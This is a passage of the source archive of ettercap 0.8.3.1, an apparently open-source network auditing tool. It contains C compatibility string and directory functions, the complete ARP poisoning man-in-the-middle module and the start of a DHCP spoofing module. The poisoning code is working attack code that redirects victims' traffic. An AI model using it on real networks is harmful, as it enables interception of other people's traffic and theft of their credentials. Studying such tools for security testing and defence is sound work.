*/ #include void *memrchr(const void *s, u_char c, size_t n) { /* * DESCRIPTION * The memrchr() function is like the memchr() function, except * that it searches backward for the first instance of c from the * end of the n bytes pointed to by s instead of forward from the * beginning. * * RETURN VALUE * The memrchr() functions return a pointer to the matching byte or * NULL if the character does not occur in the given memory area. */ const u_char *cp; if (n != 0) { cp = (u_char*)s + n; do { if (*(--cp) == (u_char)c) return (void*)cp; } while (--n != 0); } return NULL; } ettercap-0.8.3.1/src/missing/scandir.c000664 000000 000000 00000003043 13711276346 017511 0ustar00rootroot000000 000000 #include #include #include #include int scandir(const char *, struct dirent ***, int(*)(const struct dirent *), int(*)(const struct dirent **, const struct dirent **)); int alphasort(const struct dirent **a, const struct dirent **b); /* This function is only required for SunOS, all other supported OS have this function in their system library */ int scandir(const char *dir, struct dirent ***namelist, int (*select)(const struct dirent *), int (*compar)(const struct dirent **, const struct dirent **)) { DIR *d; struct dirent *entry; register int i=0; size_t entrysize; if ((d=opendir(dir)) == NULL) return(-1); *namelist=NULL; while ((entry=readdir(d)) != NULL) { if (select == NULL || (select != NULL && (*select)(entry))) { *namelist=(struct dirent **)realloc((void *)(*namelist), (size_t)((i+1)*sizeof(struct dirent *))); if (*namelist == NULL) return(-1); entrysize=sizeof(struct dirent)-sizeof(entry->d_name)+strlen(entry->d_name)+1; (*namelist)[i]=(struct dirent *)malloc(entrysize); if ((*namelist)[i] == NULL) return(-1); memcpy((*namelist)[i], entry, entrysize); i++; } } if (closedir(d)) return(-1); if (i == 0) return(-1); if (compar != NULL) qsort((void *)(*namelist), (size_t)i, sizeof(struct dirent *), (int (*)(const void *, const void *))compar); return(i); } int alphasort(const struct dirent **a, const struct dirent **b) { return(strcmp((*a)->d_name, (*b)->d_name)); } ettercap-0.8.3.1/src/missing/strcasestr.c000664 000000 000000 00000000722 13711276346 020264 0ustar00rootroot000000 000000 /* * silly implementation for the strcasestr funcion. * */ #include char *strcasestr(const char *hailstack, const char *needle); char *strcasestr(const char *hailstack, const char *needle) { register int lneed = strlen(needle); register int lhail = strlen(hailstack); register int i; for (i = 0; i < lhail; i++) { if (!strncasecmp(hailstack + i, needle, lneed)) return hailstack + i; } return NULL; } /* EOF */ ettercap-0.8.3.1/src/missing/strlcat.c000664 000000 000000 00000004661 13711276346 017551 0ustar00rootroot000000 000000 /* $NetBSD: strlcat.c,v 1.5 1999/09/20 04:39:47 lukem Exp $ */ /* from OpenBSD: strlcat.c,v 1.2 1999/06/17 16:28:58 millert Exp */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #include size_t strlcat(char *, const char *, size_t); /* * Appends src to string dst of size siz (unlike strncat, siz is the * full size of dst, not space left). At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcat(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; size_t dlen; /* Find the end of dst and adjust bytes left but don't go past end */ while (*d != '\0' && n-- != 0) d++; dlen = d - dst; n = siz - dlen; if (n == 0) return(dlen + strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(dlen + (s - src)); /* count does not include NUL */ } ettercap-0.8.3.1/src/missing/strlcpy.c000664 000000 000000 00000004175 13711276346 017575 0ustar00rootroot000000 000000 /* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #include size_t strlcpy(char *, const char *, size_t); /* * Copy src to string dst of size siz. At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcpy(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; if (n == 0) return(strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(s - src); /* count does not include NUL */ } ettercap-0.8.3.1/src/missing/strndup.c000664 000000 000000 00000002256 13711276346 017572 0ustar00rootroot000000 000000 /* Implement the strndup function. Copyright (C) 2005 Free Software Foundation, Inc. Written by Kaveh R. Ghazi . This file is part of the libiberty library. Libiberty is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Libiberty is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with libiberty; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */ #include char * strndup (const char *s, size_t n) { char *result; size_t len = strlen (s); if (n < len) len = n; result = (char *) malloc (len + 1); if (!result) return 0; result[len] = '\0'; return (char *) memcpy (result, s, len); } ettercap-0.8.3.1/src/missing/strsep.c000664 000000 000000 00000005510 13711276346 017407 0ustar00rootroot000000 000000 /* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */ /*- * Copyright (c) 1990, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #if 0 #include #include #endif char * strsep(char **, const char *); /* * Get next token from string *stringp, where tokens are possibly-empty * strings separated by characters from delim. * * Writes NULs into the string at *stringp to end tokens. * delim need not remain constant from call to call. * On return, *stringp points past the last NUL written (if there might * be further tokens), or is NULL (if there are definitely no more tokens). * * If *stringp is NULL, strsep returns NULL. */ char * strsep(stringp, delim) register char **stringp; register const char *delim; { register char *s; register const char *spanp; register int c, sc; char *tok; if ((s = *stringp) == NULL) return (NULL); for (tok = s;;) { c = *s++; spanp = delim; do { if ((sc = *spanp++) == c) { if (c == 0) s = NULL; else s[-1] = 0; *stringp = s; return (tok); } } while (sc != 0); } /* NOTREACHED */ } ettercap-0.8.3.1/src/mitm/000775 000000 000000 00000000000 13711276346 015217 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/mitm/ec_arp_poisoning.c000664 000000 000000 00000041015 13711276346 020702 0ustar00rootroot000000 000000 /* ettercap -- ARP poisoning mitm module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* globals */ /* * this are the two lists for poisoning. * each element in the each list is associated with all the element * in the other list. this is done in every case. * if one associtation has two equal element, it will be skipped. * this is done to permit overlapping groups */ /* these are LIST_HEAD (look in ec_mitm for the declaration) */ struct hosts_group arp_group_one; struct hosts_group arp_group_two; static int poison_oneway; /* protos */ void arp_poisoning_init(void); EC_THREAD_FUNC(arp_poisoner); static int arp_poisoning_start(char *args); static void arp_poisoning_stop(void); static void arp_poisoning_confirm(struct packet_object *po); static int create_silent_list(void); static int create_list(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered mitm */ void __init arp_poisoning_init(void) { struct mitm_method mm; mm.name = "arp"; mm.start = &arp_poisoning_start; mm.stop = &arp_poisoning_stop; mitm_add(&mm); } /* * init the ARP POISONING attack */ static int arp_poisoning_start(char *args) { struct hosts_list *g, *tmp; int ret; char *p; poison_oneway = 0; DEBUG_MSG("arp_poisoning_start"); /* parse the args only if not empty */ if (strcmp(args, "")) { for (p = strsep(&args, ","); p != NULL; p = strsep(&args, ",")) { if (!strcasecmp(p, "remote")) { /* * allow sniffing of remote host even * if the target is local (used for gw) */ EC_GBL_OPTIONS->remote = 1; } else if (!strcasecmp(p, "oneway")) { poison_oneway = 1; } else { SEMIFATAL_ERROR("ARP poisoning: parameter incorrect.\n"); } } } /* arp poisoning only on etherenet */ if (EC_GBL_PCAP->dlt != IL_TYPE_ETH && EC_GBL_PCAP->dlt != IL_TYPE_TR && EC_GBL_PCAP->dlt != IL_TYPE_FDDI) SEMIFATAL_ERROR("ARP poisoning does not support this media.\n"); /* we need the host list */ if (LIST_EMPTY(&EC_GBL_HOSTLIST)) SEMIFATAL_ERROR("ARP poisoning needs a non empty hosts list.\n"); /* wipe the previous lists */ LIST_FOREACH_SAFE(g, &arp_group_one, next, tmp) { LIST_REMOVE(g, next); SAFE_FREE(g); } LIST_FOREACH_SAFE(g, &arp_group_two, next, tmp) { LIST_REMOVE(g, next); SAFE_FREE(g); } /* create the list used later to poison the targets */ if (EC_GBL_OPTIONS->silent && !EC_GBL_OPTIONS->load_hosts) ret = create_silent_list(); else ret = create_list(); if (ret != E_SUCCESS) SEMIFATAL_ERROR("ARP poisoning process cannot start.\n"); /* create a hook to look for ARP requests while poisoning */ hook_add(HOOK_PACKET_ARP_RQ, &arp_poisoning_confirm); /* create the poisoning thread */ ec_thread_new("arp_poisoner", "ARP poisoning module", &arp_poisoner, NULL); return E_SUCCESS; } /* * shut down the poisoning process */ static void arp_poisoning_stop(void) { int i; struct hosts_list *h; struct hosts_list *g1, *g2; pthread_t pid; DEBUG_MSG("arp_poisoning_stop"); /* destroy the poisoner thread */ pid = ec_thread_getpid("arp_poisoner"); /* the thread is active or not ? */ if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); else return; /* stop confirming ARP requests with poisoned answers */ hook_del(HOOK_PACKET_ARP_RQ, &arp_poisoning_confirm); USER_MSG("ARP poisoner deactivated.\n"); USER_MSG("RE-ARPing the victims...\n"); ui_msg_flush(2); /* rearp the victims 3 time*/ for (i = 0; i < 3; i++) { /* walk the lists and poison the victims */ LIST_FOREACH(g1, &arp_group_one, next) { LIST_FOREACH(g2, &arp_group_two, next) { /* equal ip must be skipped */ if (!ip_addr_cmp(&g1->ip, &g2->ip)) continue; if (!EC_GBL_CONF->arp_poison_equal_mac) /* skip even equal mac address... */ if (!memcmp(g1->mac, g2->mac, MEDIA_ADDR_LEN)) continue; /* the effective poisoning packets */ if (EC_GBL_CONF->arp_poison_reply) { send_arp(ARPOP_REPLY, &g2->ip, g2->mac, &g1->ip, g1->mac); /* only send from T2 to T1 */ if (!poison_oneway) send_arp(ARPOP_REPLY, &g1->ip, g1->mac, &g2->ip, g2->mac); } if (EC_GBL_CONF->arp_poison_request) { send_arp(ARPOP_REQUEST, &g2->ip, g2->mac, &g1->ip, g1->mac); /* only send from T2 to T1 */ if (!poison_oneway) send_arp(ARPOP_REQUEST, &g1->ip, g1->mac, &g2->ip, g2->mac); } ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } } /* sleep the correct delay, same as warm_up */ ec_usleep(SEC2MICRO(EC_GBL_CONF->arp_poison_warm_up)); } /* delete the elements in the first list */ while (LIST_FIRST(&arp_group_one) != NULL) { h = LIST_FIRST(&arp_group_one); LIST_REMOVE(h, next); SAFE_FREE(h); } /* delete the elements in the second list */ while (LIST_FIRST(&arp_group_two) != NULL) { h = LIST_FIRST(&arp_group_two); LIST_REMOVE(h, next); SAFE_FREE(h); } /* reset the remote flag */ EC_GBL_OPTIONS->remote = 0; } /* * the real ARP POISONER thread */ EC_THREAD_FUNC(arp_poisoner) { int i = 1; struct hosts_list *g1, *g2; /* variable not used */ (void) EC_THREAD_PARAM; /* init the thread and wait for start up */ ec_thread_init(); /* never ending loop */ LOOP { CANCELLATION_POINT(); /* walk the lists and poison the victims */ LIST_FOREACH(g1, &arp_group_one, next) { LIST_FOREACH(g2, &arp_group_two, next) { /* equal ip must be skipped, you cant poison itself */ if (!ip_addr_cmp(&g1->ip, &g2->ip)) continue; if (!EC_GBL_CONF->arp_poison_equal_mac) /* skip even equal mac address... */ if (!memcmp(g1->mac, g2->mac, MEDIA_ADDR_LEN)) continue; /* * send the spoofed ICMP echo request * to force the arp entry in the cache */ if (i == 1 && EC_GBL_CONF->arp_poison_icmp) { send_L2_icmp_echo(ICMP_ECHO, &g2->ip, &g1->ip, g1->mac); /* only send from T2 to T1 */ if (!poison_oneway) send_L2_icmp_echo(ICMP_ECHO, &g1->ip, &g2->ip, g2->mac); } /* the effective poisoning packets */ if (EC_GBL_CONF->arp_poison_reply) { send_arp(ARPOP_REPLY, &g2->ip, EC_GBL_IFACE->mac, &g1->ip, g1->mac); /* only send from T2 to T1 */ if (!poison_oneway) send_arp(ARPOP_REPLY, &g1->ip, EC_GBL_IFACE->mac, &g2->ip, g2->mac); } /* request attack */ if (EC_GBL_CONF->arp_poison_request) { send_arp(ARPOP_REQUEST, &g2->ip, EC_GBL_IFACE->mac, &g1->ip, g1->mac); /* only send from T2 to T1 */ if (!poison_oneway) send_arp(ARPOP_REQUEST, &g1->ip, EC_GBL_IFACE->mac, &g2->ip, g2->mac); } ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } } /* if smart poisoning is enabled only poison initial and then only on request */ if (EC_GBL_CONF->arp_poison_smart && i >= 3) return NULL; /* * wait the correct delay: * for the first 5 time use the warm_up * then use normal delay */ if (i < 5) { ec_usleep(SEC2MICRO(EC_GBL_CONF->arp_poison_warm_up)); i++; } else { ec_usleep(SEC2MICRO(EC_GBL_CONF->arp_poison_delay)); } } return NULL; } /* * if a target wants to reconfirm the poisoned ARP information * it should be confirmed while poisoning */ static void arp_poisoning_confirm(struct packet_object *po) { struct hosts_list *g1, *g2; char tmp[MAX_ASCII_ADDR_LEN]; /* ignore ARP requests origined by ourself */ if (!memcmp(po->L2.src, EC_GBL_IFACE->mac, MEDIA_ADDR_LEN)) return; DEBUG_MSG("arp_poisoning_confirm(%s)", ip_addr_ntoa(&po->L3.dst, tmp)); /* walk through the lists if ARP request was for a victim */ LIST_FOREACH(g1, &arp_group_one, next) { /* if the sender is in group one ... */ if (!ip_addr_cmp(&po->L3.src, &g1->ip)) { /* look if the target is in group two ... */ LIST_FOREACH(g2, &arp_group_two, next) { if (!ip_addr_cmp(&po->L3.dst, &g2->ip)) { /* confirm the sender with the poisoned ARP reply */ send_arp(ARPOP_REPLY, &po->L3.dst, EC_GBL_IFACE->mac, &po->L3.src, po->L2.src); } } } if (!poison_oneway) { /* else if the target is in group one ... */ if (!ip_addr_cmp(&po->L3.dst, &g1->ip)) { /* look if the sender is in group two ... */ LIST_FOREACH(g2, &arp_group_two, next) { if (!ip_addr_cmp(&po->L3.src, &g2->ip)) { /* confirm the sender with the poisoned ARP reply */ send_arp(ARPOP_REPLY, &po->L3.dst, EC_GBL_IFACE->mac, &po->L3.src, po->L2.src); } } } } } } /* * create the list of victims * in silent mode only the first target is selected and you * have to specify the mac address if you have specified an * ip address. you can also have an 'ANY' target and the * arp poisoning will be broadcasted. */ static int create_silent_list(void) { struct ip_list *i, *j; struct hosts_list *h, *g; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("create_silent_list"); /* allocate the struct */ SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); USER_MSG("\nARP poisoning victims:\n\n"); /* examine the first target */ if ((i = LIST_FIRST(&EC_GBL_TARGET1->ips)) != NULL) { /* the the ip was specified, even the mac address must be specified */ if (!memcmp(EC_GBL_TARGET1->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN) ) { USER_MSG("\nERROR: MAC address must be specified in silent mode.\n"); return -E_FATAL; } USER_MSG(" TARGET 1 : %-15s %17s\n", ip_addr_ntoa(&i->ip, tmp), mac_addr_ntoa(EC_GBL_TARGET1->mac, tmp2)); /* copy the information */ memcpy(&h->ip, &i->ip, sizeof(struct ip_addr)); memcpy(&h->mac, &EC_GBL_TARGET1->mac, MEDIA_ADDR_LEN); } else { USER_MSG(" TARGET 1 : %-15s FF:FF:FF:FF:FF:FF\n", "ANY"); /* set the broadcasts */ memcpy(&h->ip, &EC_GBL_IFACE->network, sizeof(struct ip_addr)); /* XXX - IPv6 compatible */ /* the broadcast is the network address | ~netmask */ *h->ip.addr32 |= ~(*EC_GBL_IFACE->netmask.addr32); /* broadcast mac address */ memcpy(&h->mac, MEDIA_BROADCAST, MEDIA_ADDR_LEN); } /* examine the second target */ if ((j = LIST_FIRST(&EC_GBL_TARGET2->ips)) != NULL) { /* the the ip was specified, even the mac address must be specified */ if (!memcmp(EC_GBL_TARGET2->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN) ) { USER_MSG("\nERROR: MAC address must be specified in silent mode.\n"); return -E_FATAL; } USER_MSG(" TARGET 2 : %-15s %17s\n", ip_addr_ntoa(&j->ip, tmp), mac_addr_ntoa(EC_GBL_TARGET2->mac, tmp2)); /* copy the information */ memcpy(&g->ip, &j->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &EC_GBL_TARGET2->mac, MEDIA_ADDR_LEN); } else { USER_MSG(" TARGET 2 : %-15s FF:FF:FF:FF:FF:FF\n", "ANY"); /* set the broadcasts */ memcpy(&g->ip, &EC_GBL_IFACE->network, sizeof(struct ip_addr)); /* XXX - IPv6 compatible */ /* the broadcast is the network address | ~netmask */ *g->ip.addr32 |= ~(*EC_GBL_IFACE->netmask.addr32); /* broadcast mac address */ memcpy(&g->mac, MEDIA_BROADCAST, MEDIA_ADDR_LEN); } if (i == j || ntohs(i->ip.addr_type) != AF_INET || ntohs(j->ip.addr_type) != AF_INET) { USER_MSG("\nERROR: Cannot ARP poison these targets...\n"); SAFE_FREE(h); SAFE_FREE(g); return -E_FATAL; } /* add the elements in the two lists */ LIST_INSERT_HEAD(&arp_group_one, h, next); LIST_INSERT_HEAD(&arp_group_two, g, next); return E_SUCCESS; } /* * create the list of multiple victims. * the list is joined with the hosts list created with the * initial arp scan because we need to know the mac address * of the victims */ static int create_list(void) { struct ip_list *i; struct hosts_list *h, *g; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("create_list"); USER_MSG("\nARP poisoning victims:\n\n"); /* the first group */ LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { if (!ip_addr_cmp(&i->ip, &h->ip)) { USER_MSG(" GROUP 1 : %s %s\n", ip_addr_ntoa(&h->ip, tmp), mac_addr_ntoa(h->mac, tmp2)); /* create the element and insert it in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_group_one, g, next); } } } /* the target is NULL. convert to ANY (all the hosts) */ if (LIST_FIRST(&EC_GBL_TARGET1->ips) == NULL) { USER_MSG(" GROUP 1 : ANY (all the hosts in the list)\n"); /* add them */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* only IPv4 */ if (ntohs(h->ip.addr_type) != AF_INET) continue; /* create the element and insert it in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_group_one, g, next); } } USER_MSG("\n"); /* the second group */ /* if the target was specified */ LIST_FOREACH(i, &EC_GBL_TARGET2->ips, next) { LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { if (!ip_addr_cmp(&i->ip, &h->ip)) { USER_MSG(" GROUP 2 : %s %s\n", ip_addr_ntoa(&h->ip, tmp), mac_addr_ntoa(h->mac, tmp2)); /* create the element and insert it in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_group_two, g, next); } } } /* the target is NULL. convert to ANY (all the hosts) */ if (LIST_FIRST(&EC_GBL_TARGET2->ips) == NULL) { USER_MSG(" GROUP 2 : ANY (all the hosts in the list)\n"); /* add them */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* only IPv4 */ if (ntohs(h->ip.addr_type) != AF_INET) continue; /* create the element and insert it in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_group_two, g, next); } } return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/mitm/ec_dhcp_spoofing.c000664 000000 000000 00000023427 13711276346 020664 0ustar00rootroot000000 000000 /* ettercap -- DHCP spoofing mitm module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include /* globals */ static struct target_env dhcp_ip_pool; static struct ip_list *dhcp_free_ip; static struct ip_addr dhcp_netmask; static struct ip_addr dhcp_dns; static char dhcp_options[1500]; static size_t dhcp_optlen; /* protos */ void dhcp_spoofing_init(void); static int dhcp_spoofing_start(char *args); static void dhcp_spoofing_stop(void); static void dhcp_spoofing_req(struct packet_object *po); static void dhcp_spoofing_disc(struct packet_object *po); static void dhcp_setup_options(void); static struct ip_addr *dhcp_addr_reply(struct ip_addr *radd); /* from dissectors/ec_dhcp.c */ extern u_int8 * get_dhcp_option(u_int8 opt, u_int8 *ptr, u_int8 *end); extern void put_dhcp_option(u_int8 opt, u_int8 *value, u_int8 len, u_int8 **ptr); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered mitm */ void __init dhcp_spoofing_init(void) { struct mitm_method mm; mm.name = "dhcp"; mm.start = &dhcp_spoofing_start; mm.stop = &dhcp_spoofing_stop; mitm_add(&mm); } /* * init the ICMP REDIRECT attack */ static int dhcp_spoofing_start(char *args) { char *p; int i = 1; DEBUG_MSG("dhcp_spoofing_start"); if (!strcmp(args, "")) SEMIFATAL_ERROR("DHCP spoofing needs a parameter.\n"); /* * Check to see if sniff has started - started automatically in text UI */ if (EC_GBL_UI->type != UI_TEXT && !EC_GBL_SNIFF->active) SEMIFATAL_ERROR("DHCP spoofing requires sniffing to be active.\n"); /* check the parameter: * * ip_pool/netmask/dns */ for (p = strsep(&args, "/"); p != NULL; p = strsep(&args, "/")) { /* first parameter (the ip_pool) */ if (i == 1) { char tmp[strlen(p)+4]; /* add the / to be able to use the target parsing function */ snprintf(tmp, strlen(p)+4, "/%s//", p); if (compile_target(tmp, &dhcp_ip_pool) != E_SUCCESS) break; /* second parameter (the netmask) */ } else if (i == 2) { /* convert from string and get the netmask */ if (ip_addr_pton(p, &dhcp_netmask) != E_SUCCESS) break; /* third parameter (the dns server) */ } else if (i == 3) { char tmp[MAX_ASCII_ADDR_LEN]; /* convert from string and get the netmask */ if (ip_addr_pton(p, &dhcp_dns) != E_SUCCESS) break; /* all the parameters were parsed correctly... */ USER_MSG("DHCP spoofing: using specified ip_pool, netmask %s", ip_addr_ntoa(&dhcp_netmask, tmp)); USER_MSG(", dns %s\n", ip_addr_ntoa(&dhcp_dns, tmp)); /* add the hookpoints */ hook_add(HOOK_PROTO_DHCP_REQUEST, dhcp_spoofing_req); hook_add(HOOK_PROTO_DHCP_DISCOVER, dhcp_spoofing_disc); /* create the options */ dhcp_setup_options(); /* se the pointer to the first ip pool address */ dhcp_free_ip = LIST_FIRST(&dhcp_ip_pool.ips); return E_SUCCESS; } i++; } /* error parsing the parameter */ SEMIFATAL_ERROR("DHCP spoofing: parameter number %d is incorrect.\n", i); return -E_FATAL; } /* * shut down the redirect process */ static void dhcp_spoofing_stop(void) { DEBUG_MSG("dhcp_spoofing_stop"); USER_MSG("DHCP spoofing stopped.\n"); /* remove the hookpoint */ hook_del(HOOK_PROTO_DHCP_REQUEST, dhcp_spoofing_req); hook_del(HOOK_PROTO_DHCP_DISCOVER, dhcp_spoofing_disc); } /* * Find the right address to reply */ static struct ip_addr *dhcp_addr_reply(struct ip_addr *radd) { static struct ip_addr broad_addr; u_int32 broad_int32 = 0xffffffff; ip_addr_init(&broad_addr, AF_INET, (u_char *)&broad_int32); /* check if the source is 0.0.0.0 */ if ( ip_addr_is_zero(radd) ) return &broad_addr; return radd; } /* * parses the request and send the spoofed reply */ static void dhcp_spoofing_req(struct packet_object *po) { char dhcp_hdr[LIBNET_DHCPV4_H]; struct libnet_dhcpv4_hdr *dhcp; u_int8 *options, *opt, *end; struct ip_addr client, server; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("dhcp_spoofing_req"); /* get a local copy of the dhcp header */ memcpy(dhcp_hdr, po->DATA.data, LIBNET_DHCPV4_H); dhcp = (struct libnet_dhcpv4_hdr *)dhcp_hdr; /* get the pointers to options */ options = po->DATA.data + LIBNET_DHCPV4_H; end = po->DATA.data + po->DATA.len; /* use the same dhcp header, but change the type of the message */ dhcp->dhcp_opcode = LIBNET_DHCP_REPLY; /* * if the client is requesting a particular IP address, * release it. so we don't mess the network too much... * only change the router ip ;) */ /* get the requested ip */ if ((opt = get_dhcp_option(DHCP_OPT_RQ_ADDR, options, end)) != NULL) 